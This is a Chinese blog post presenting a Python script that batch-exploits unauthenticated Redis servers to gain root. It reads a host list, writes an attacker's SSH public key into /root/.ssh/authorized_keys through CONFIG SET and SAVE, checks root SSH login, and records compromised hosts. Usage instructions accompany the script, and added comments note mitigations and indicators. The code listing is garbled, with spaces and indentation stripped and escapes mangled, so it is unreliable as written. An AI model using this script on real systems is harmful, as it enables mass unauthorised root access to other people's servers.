python脚本实现Redis未授权批量提权
前言
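本文介绍Redis未授权访问导致批量提权的相关内容:当Redis未设置访问密码、可以被外部直接连接,并且以root身份运行时,任何客户端都可以通过CONFIG SET修改持久化文件的保存目录和文件名,把一段SSH公钥写入/root/.ssh/authorized_keys,从而以root身份登录主机。下面的脚本演示的就是这一过程,分享出来供大家参考学习。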
安装依赖
sudoeasy_installredis
使用
redispythonhackredis.py usage:hackredis.py[-h][-lIPLIST][-pPORT][-rID_RSAFILE][-spSSH_PORT] ForExample: ----------------------------------------------------------------------------- pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22 optionalarguments: -h,--helpshowthishelpmessageandexit -lIPLISTthehostsoftarget -pPORTtheredisdefaultport -rID_RSAFILEthesshid_rsafileyougenerate -spSSH_PORTthesshport
首先需要ssh密钥:
ssh-keygen-trsa cp~/.ssh/id_rsa.pub/tmp/foo.txt
之后将ip列表填入ip.txt,然后就可以跑了。成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt,操作失败的会存储在fail.txt。
#!/usr/bin/python
#coding:utf-8
#############################################################
##@filehackredis.py##
##@date2015-12-11##
##@authorevi1cg##
#############################################################
importredis
importargparse
importtextwrap
importsys
importpexpect
# Build and parse the command line for this script.
# Options defined below: -l (file listing the hosts), -p (Redis port, default
# 6379), -r (key file whose first line is later stored in Redis), -sp (SSH
# port, default 22).
# NOTE(review): despite the ID_RSAFILE name, the page's setup step copies
# ~/.ssh/id_rsa.pub into this file, i.e. it holds a public key, not a private one.
# NOTE(review): spaces and indentation were lost when this listing was
# published; the code lines are kept exactly as they appear on the page.
defgetargs():
parser=argparse.ArgumentParser(prog='hackredis.py',formatter_class=argparse.RawTextHelpFormatter,description=textwrap.dedent('''/
ForExample:
-----------------------------------------------------------------------------
pythonhackredis.py-lip.txt-p6379-rfoo.txt-sp22'''))
parser.add_argument('-l',dest='iplist',type=str,help='thehostsoftarget')
parser.add_argument('-p',dest='port',default=6379,type=int,help='theredisdefaultport')
parser.add_argument('-r',dest='id_rsafile',type=str,help='thesshid_rsafileyougenerate')
parser.add_argument('-sp',dest='ssh_port',type=int,default=22,help='thesshport')
# Unless the number of command-line tokens divided by two equals 4 (all four
# flag/value pairs supplied), '-h' is appended so argparse prints the help
# text and exits instead of running. None of the options is marked required,
# so this count is the only completeness check.
if(len(sys.argv[1:])/2!=4):
sys.argv.append('-h')
returnparser.parse_args()
# Attempt the Redis-to-authorized_keys write against a single host, then hand
# the host to check() if no exception was raised.
#
# What the calls below amount to, read from the defender's side:
#  - The client connects to db 0 with a 2-second socket timeout and passes no
#    password, so it only gets anywhere on an instance that accepts
#    unauthenticated commands over this network path.
#  - The key text held in the global `foo` is stored under the key 'crackit'.
#  - CONFIG SET points the dump directory at /root/.ssh/ and the dump file name
#    at authorized_keys; SAVE then writes the dataset to that path. The write
#    requires the redis-server process to have write access to /root/.ssh/,
#    which is why running Redis under an unprivileged account removes the impact.
#
# Indicators that follow directly from this code: a key named 'crackit',
# `dir` set to /root/.ssh/, `dbfilename` set to authorized_keys, and an
# authorized_keys file that holds Redis dump data around a public key.
# CONFIG SET dir/dbfilename issued by a remote client is worth alerting on in
# its own right.
defhackredis(host,port):
# ck records whether the Redis sequence ran without raising (1) or not (0).
ck=0
try:
print"[*]Attackingip:%s"%host
r=redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)
# flushall is named on the next line; FLUSHALL deletes every key in every
# database, so an instance hit by this technique may have lost its data as
# well as exposed its host.
r.flushall
r.set('crackit',foo)
r.config_set('dir','/root/.ssh/')
r.config_set('dbfilename','authorized_keys')
r.save()
ck=1
# Bare except: every exception is handled the same way, so the output does not
# say why a host failed. The host is appended to fail.txt via write(host,2).
except:
print"/033[1;31;40m[-]/033[0mSomethingwrongwith%s"%host
write(host,2)
ck=0
# Only hosts where the whole sequence completed are passed to the SSH check.
ifck==1:
check(host)
else:
pass
# Confirm the outcome by opening an SSH session as root on the module-level
# ssh_port (set in main()).
# The ssh command carries no password or identity option, so it depends on
# whatever key the local ssh client offers by default.
# expect() waits up to 2 seconds for the pattern '[#/$]'; with a single pattern
# a match returns index 0, which is recorded as success via write(host,1)
# (success.txt). Any exception from spawn()/expect() is recorded via
# write(host,3) (unconnect.txt); the code does not distinguish the cause.
# Defender note: on the target this step would typically appear in the sshd
# auth log as a root login from an unfamiliar source address; hosts with
# `PermitRootLogin no` in sshd_config are not reachable by this step.
defcheck(host):
print'/033[1;33;40m[*]/033[0mCheckconnecting...'
try:
ssh=pexpect.spawn('sshroot@%s-p%d'%(host,ssh_port))
i=ssh.expect('[#/$]',timeout=2)
ifi==0:
print"/033[1;34;40m[+]/033[0mSuccess!"
write(host,1)
else:
pass
except:
print"/033[1;32;40m[-]/033[0mFailedtoconnect!"
write(host,3)
# Append one host to the result file selected by the status code `suc`:
#   1 -> success.txt   (Redis sequence completed and the SSH check matched)
#   2 -> fail.txt      (the Redis sequence raised)
#   3 -> unconnect.txt (Redis sequence completed, SSH check raised)
# Callers on this page pass only 1, 2 or 3; no file name is assigned for any
# other value.
# The files are opened in append mode with relative names, so they accumulate
# in the current working directory across runs.
defwrite(host,suc):
ifsuc==1:
filesname='success.txt'
elifsuc==2:
filesname='fail.txt'
elifsuc==3:
filesname='unconnect.txt'
else:
pass
file_object=open(filesname,'a')
file_object.write(host+'/n')
file_object.close()
# Entry point: read the options, load the host list and the key file, then run
# hackredis() on each host in turn (sequentially, one host at a time).
defmain():
# foo (the key payload) and ssh_port are module-level globals because
# hackredis() and check() read them without receiving them as parameters.
globalfoo,ssh_port
paramsargs=getargs()
try:
hosts=open(paramsargs.iplist,"r")
except(IOError):
print"Error:Checkyourhostfilepath/n"
sys.exit(1)
port=paramsargs.port
ssh_port=paramsargs.ssh_port
# Only the first line of the key file is used, wrapped in padding on both
# sides. Because the value ends up inside a Redis dump file, a resulting
# authorized_keys contains non-key data around the key line, which is a
# useful thing to look for during triage.
try:
foo='/n/n/n'+open(paramsargs.id_rsafile,"r").readline()+'/n/n/n'
# NOTE(review): the message below says "wordlist" although the file that failed
# to open is the key file given with -r.
except(IOError):
print"Error:Checkyourwordlistpath/n"
sys.exit(1)
# The host-file handle is never closed explicitly; each entry is stripped of
# surrounding whitespace before use.
ips=[p.replace('/n','')forpinhosts]
foripinips:
hackredis(ip.strip(),port)
# Run main() only when the file is executed as a script, not when imported.
if__name__=="__main__":
main()
总结
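以上就是这篇文章的全部内容了。从防护角度看,脚本的每一步都依赖Redis的不安全配置:为Redis设置requirepass、通过bind和防火墙限制6379端口的访问来源、保持protected-mode开启(Redis 3.2及以上版本)、使用非root账户运行Redis,并用rename-command禁用或重命名CONFIG等命令,即可阻断这一过程;排查时可检查/root/.ssh/authorized_keys中是否混有二进制内容,以及Redis中是否存在名为crackit的键。希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。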